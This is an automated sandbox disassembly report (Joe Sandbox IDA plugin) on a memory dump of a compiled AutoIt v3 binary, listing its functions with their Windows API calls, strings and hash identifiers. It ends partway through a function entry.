Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 80d5c76f2dc5114a0074a7133507d91e1bb3455975c2540be50871ef01c66178
Instruction ID: d993678917c895e525473c84c65e9370b1d09a67b9670c0c95426c1396bf5f54
Opcode Fuzzy Hash: 80d5c76f2dc5114a0074a7133507d91e1bb3455975c2540be50871ef01c66178
Instruction Fuzzy Hash: AAB16A71604340AFDB14DF64C858F6ABBE5BF88310F00891CF599AB2A1D779EC04CBA5

Function 007427D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007428BC
GetSystemMetrics.USER32(00000007), ref: 007428C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007428EF
GetSystemMetrics.USER32(00000008), ref: 007428F7
GetSystemMetrics.USER32(00000004), ref: 0074291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00742939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00742949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0074297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00742990
GetClientRect.USER32(00000000,000000FF), ref: 007429AE
GetStockObject.GDI32(00000011), ref: 007429CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 007429D5

Part of subcall function 00742344: GetCursorPos.USER32(?), ref: 00742357
Part of subcall function 00742344: ScreenToClient.USER32(008067B0,?), ref: 00742374
Part of subcall function 00742344: GetAsyncKeyState.USER32(00000001), ref: 00742399
Part of subcall function 00742344: GetAsyncKeyState.USER32(00000002), ref: 007423A7

SetTimer.USER32(00000000,00000000,00000028,00741256), ref: 007429FC

Strings

AutoIt v3 GUI, xrefs: 00742974

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b403a725f17bd8bdb2f3695d2758e21da9c7f330c6ac0534ef796cc29afec7fe
Instruction ID: a93ffb20cfc97e6c622b4e1f927b358e87bf48de2ef6c2ec75661251168cad06
Opcode Fuzzy Hash: b403a725f17bd8bdb2f3695d2758e21da9c7f330c6ac0534ef796cc29afec7fe
Instruction Fuzzy Hash: CCB15E7160020ADFDF15DFA8DC45FAE7BB5FB08314F108229FA15E6290DB789861CB55

Function 007C4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007C40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007C41B6

Strings

GETITEMCOUNT, xrefs: 007C4128
VIEWCHANGE, xrefs: 007C4375
SELECTINVERT, xrefs: 007C4286
ISSELECTED, xrefs: 007C41C1
GETTEXT, xrefs: 007C415F
GETSUBITEMCOUNT, xrefs: 007C4141
SELECTALL, xrefs: 007C421D
DESELECT, xrefs: 007C42A4
FINDITEM, xrefs: 007C4329
GETSELECTEDCOUNT, xrefs: 007C4199
SELECTCLEAR, xrefs: 007C4235
SELECT, xrefs: 007C4250
GETSELECTED, xrefs: 007C42E4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 838b2e7aebfec2dc7f543769839635388885e5bda5d01498b2db8782b59c13a4
Instruction ID: 61b777f3516f51655ca8b0d8d864e210a6c39244e0b539732e330c8c450239b7
Opcode Fuzzy Hash: 838b2e7aebfec2dc7f543769839635388885e5bda5d01498b2db8782b59c13a4
Instruction Fuzzy Hash: BEA17D70214245DBCB14EF20C966F6AB3A5BF85314F14896CB996AB392DB3CEC05CB91

Function 007B52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 007B5309
LoadCursorW.USER32(00000000,00007F8A), ref: 007B5314
LoadCursorW.USER32(00000000,00007F00), ref: 007B531F
LoadCursorW.USER32(00000000,00007F03), ref: 007B532A
LoadCursorW.USER32(00000000,00007F8B), ref: 007B5335
LoadCursorW.USER32(00000000,00007F01), ref: 007B5340
LoadCursorW.USER32(00000000,00007F81), ref: 007B534B
LoadCursorW.USER32(00000000,00007F88), ref: 007B5356
LoadCursorW.USER32(00000000,00007F80), ref: 007B5361
LoadCursorW.USER32(00000000,00007F86), ref: 007B536C
LoadCursorW.USER32(00000000,00007F83), ref: 007B5377
LoadCursorW.USER32(00000000,00007F85), ref: 007B5382
LoadCursorW.USER32(00000000,00007F82), ref: 007B538D
LoadCursorW.USER32(00000000,00007F84), ref: 007B5398
LoadCursorW.USER32(00000000,00007F04), ref: 007B53A3
LoadCursorW.USER32(00000000,00007F02), ref: 007B53AE
GetCursorInfo.USER32(?), ref: 007B53BE
GetLastError.KERNEL32(00000001,00000000), ref: 007B53E9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 3bd6baab93411cbceeedddd479facaf50876d091d3ed24ec567568d6ea5d8afa
Instruction ID: 73d75bc388e8622abf23c28b849020fdc0e9c918751e147ae64a309c794fe736
Opcode Fuzzy Hash: 3bd6baab93411cbceeedddd479facaf50876d091d3ed24ec567568d6ea5d8afa
Instruction Fuzzy Hash: AB416470E04319AADB109FBA8C49DAFFFF8EF51B50B10452FE509E7290DAB89501CE51

Function 0079AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0079AAA5
__swprintf.LIBCMT ref: 0079AB46
_wcscmp.LIBCMT ref: 0079AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0079ABAE
_wcscmp.LIBCMT ref: 0079ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0079AC21
GetDlgCtrlID.USER32(?), ref: 0079AC73
GetWindowRect.USER32(?,?), ref: 0079ACA9
GetParent.USER32(?), ref: 0079ACC7
ScreenToClient.USER32(00000000), ref: 0079ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0079AD48
_wcscmp.LIBCMT ref: 0079AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0079AD82
_wcscmp.LIBCMT ref: 0079AD96

Part of subcall function 0076386C: _iswctype.LIBCMT ref: 00763874

Strings

%s%u, xrefs: 0079AB40

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 320ea1b688101f89fb3f2eca8631b0e19d2b6340b3c19923d49a5e4ab0b12bba
Instruction ID: a0f27596f4c1d36b532059266c13e320444a8290097d3db8e1ee0fd3ac328848
Opcode Fuzzy Hash: 320ea1b688101f89fb3f2eca8631b0e19d2b6340b3c19923d49a5e4ab0b12bba
Instruction Fuzzy Hash: 1FA1CD71205606FBDB14DF20D888FAAB7A8FF04315F108629F999D2590DB38E945CBE2

Function 0079B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0079B3DB
_wcscmp.LIBCMT ref: 0079B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0079B414
CharUpperBuffW.USER32(?,00000000), ref: 0079B431
_wcscmp.LIBCMT ref: 0079B44F
_wcsstr.LIBCMT ref: 0079B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0079B498
_wcscmp.LIBCMT ref: 0079B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0079B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0079B518
_wcscmp.LIBCMT ref: 0079B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0079B550
GetWindowRect.USER32(00000004,?), ref: 0079B5B9

Strings

@, xrefs: 0079B3BC
ThumbnailClass, xrefs: 0079B4A3, 0079B523

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 69a483b88a16039578f2af807fab20f9f76743a13e60b8f44304d6ca7bf611ec
Instruction ID: 686a0ac636d709b17d96384d5b5dde76c9c648565408fb2d6f70d318d29365bd
Opcode Fuzzy Hash: 69a483b88a16039578f2af807fab20f9f76743a13e60b8f44304d6ca7bf611ec
Instruction Fuzzy Hash: 50818F710083459BDF04DF10EA85FAA7BE8EF44714F04856DFD859A0A2DB38ED49CB61

Function 0079B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0079B23F

Strings

[ACTIVE, xrefs: 0079B22C
LAST, xrefs: 0079B204
[ALL, xrefs: 0079B2E5
[REGEXPTITLE:, xrefs: 0079B267
ALL, xrefs: 0079B2D3
CLASSNAME=, xrefs: 0079B27C
HANDLE=, xrefs: 0079B238
ACTIVE, xrefs: 0079B21A
[CLASS:, xrefs: 0079B28F
REGEXP=, xrefs: 0079B254
[LAST, xrefs: 0079B2EC
[HANDLE:, xrefs: 0079B24B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 51dea079ef1eb7eef47b273e32297ce46d64fa3cf3a2ac2e5a7f86758ab125a8
Instruction ID: 5a40fda26a8863b09595ce7ae16c89703ac14fe8e8bb1c41e8ead0388cf2bfd8
Opcode Fuzzy Hash: 51dea079ef1eb7eef47b273e32297ce46d64fa3cf3a2ac2e5a7f86758ab125a8
Instruction Fuzzy Hash: 2F315E71A44209E6DF18FB60EE47EBE7764EF10750F600129F641B11D2EF6D6E04C951

Function 0079C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0079C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0079C4E6
SetWindowTextW.USER32(?,?), ref: 0079C4FD
GetDlgItem.USER32(?,000003EA), ref: 0079C512
SetWindowTextW.USER32(00000000,?), ref: 0079C518
GetDlgItem.USER32(?,000003E9), ref: 0079C528
SetWindowTextW.USER32(00000000,?), ref: 0079C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0079C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0079C569
GetWindowRect.USER32(?,?), ref: 0079C572
SetWindowTextW.USER32(?,?), ref: 0079C5DD
GetDesktopWindow.USER32 ref: 0079C5E3
GetWindowRect.USER32(00000000), ref: 0079C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0079C636
GetClientRect.USER32(?,?), ref: 0079C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0079C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0079C693

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 15098a8b72aabe614fb530b8928e515f05e32f2bca90002591bcb74a7f3daa01
Instruction ID: d333748493a8348589abd6db8c0af52846d3e6e1b42cdffecd7589d6caa4b92b
Opcode Fuzzy Hash: 15098a8b72aabe614fb530b8928e515f05e32f2bca90002591bcb74a7f3daa01
Instruction Fuzzy Hash: 62514A70A00709AFDF219FA8DD89F6EBBB5FB04705F10492CE686A25A0C778A914CB54

Function 007CA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007CA4C8
DestroyWindow.USER32(?,?), ref: 007CA542

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007CA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007CA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CA5F1
DestroyWindow.USER32(00000000), ref: 007CA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00740000,00000000), ref: 007CA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CA663
GetDesktopWindow.USER32 ref: 007CA67C
GetWindowRect.USER32(00000000), ref: 007CA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007CA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007CA6B3

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

Strings

tooltips_class32, xrefs: 007CA5B5, 007CA643
0, xrefs: 007CA4DE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: fba57f513c91e5ad8897af9f38c56cc155bb061e36753374657b1950504babc6
Instruction ID: d70a31184aa125afcea42fed1d65840b672301d92c326ea93feccea1415e22e0
Opcode Fuzzy Hash: fba57f513c91e5ad8897af9f38c56cc155bb061e36753374657b1950504babc6
Instruction Fuzzy Hash: 6171AC71140309AFD720CF28DC49F6A7BE6FB88309F08852DF985972A0D779E916DB16

Function 007CC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

DragQueryPoint.SHELL32(?,?), ref: 007CC917

Part of subcall function 007CADF1: ClientToScreen.USER32(?,?), ref: 007CAE1A
Part of subcall function 007CADF1: GetWindowRect.USER32(?,?), ref: 007CAE90
Part of subcall function 007CADF1: PtInRect.USER32(?,?,007CC304), ref: 007CAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 007CC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007CC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007CC9AE
_wcscat.LIBCMT ref: 007CC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007CC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 007CCA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 007CCA25
SendMessageW.USER32(?,000000B1,?,?), ref: 007CCA47
DragFinish.SHELL32(?), ref: 007CCA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007CCB41

Strings

@GUI_DROPID, xrefs: 007CCA6E
@GUI_DRAGFILE, xrefs: 007CCAF0
@GUI_DRAGID, xrefs: 007CCAB9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: e0f908fed817b98e33703faa583475ec760d2229b6879dac15947fa8a8a87489
Instruction ID: c20aa165e2335d2cc2c9985b91453ec382dfe5385a3970240739f774ae1b15a7
Opcode Fuzzy Hash: e0f908fed817b98e33703faa583475ec760d2229b6879dac15947fa8a8a87489
Instruction Fuzzy Hash: 6F615C71108305AFC701DF64CC89EAFBBE9FF88750F004A2DF695962A1DB749A49CB52

Function 007C4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007C46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C46F6

Strings

GETITEMCOUNT, xrefs: 007C47D8
ISCHECKED, xrefs: 007C4879
COLLAPSE, xrefs: 007C473C
EXPAND, xrefs: 007C47A8
UNCHECK, xrefs: 007C48D2
GETTEXT, xrefs: 007C4849
CHECK, xrefs: 007C4716
SELECT, xrefs: 007C48A7
GETSELECTED, xrefs: 007C4806
EXISTS, xrefs: 007C475F
GETTOTALCOUNT, xrefs: 007C46DD

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: d154fca3900683635895467124eca32378834e353c87f5de4b9319c5d800198d
Instruction ID: dcfacddd933740f74c12798d8edd21e426c6d5ef5e95800f0bef4863e7d7de4f
Opcode Fuzzy Hash: d154fca3900683635895467124eca32378834e353c87f5de4b9319c5d800198d
Instruction Fuzzy Hash: 64915A34204705DFCB14EF20C465A6AB7A5AF95314F04896CF9966B3A2CB38ED4ACB81

Function 007CBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007CBB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007C6D80,?), ref: 007CBBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CBC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007CBC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CBC7D
FreeLibrary.KERNEL32(?), ref: 007CBC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007CBC99
DestroyIcon.USER32(?), ref: 007CBCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007CBCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007CBCD1

Part of subcall function 0076313D: __wcsicmp_l.LIBCMT ref: 007631C6

Strings

.exe, xrefs: 007CBB04
.dll, xrefs: 007CBB27
.icl, xrefs: 007CBAE4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 664bf000aad649a5b19d0337a2b2ca517abaa9b29967fc62b331af19fdea931b
Instruction ID: 20c3cd5758455b754003de0303091a0e2871c3f1284e25ae68ecb2e3b2d66946
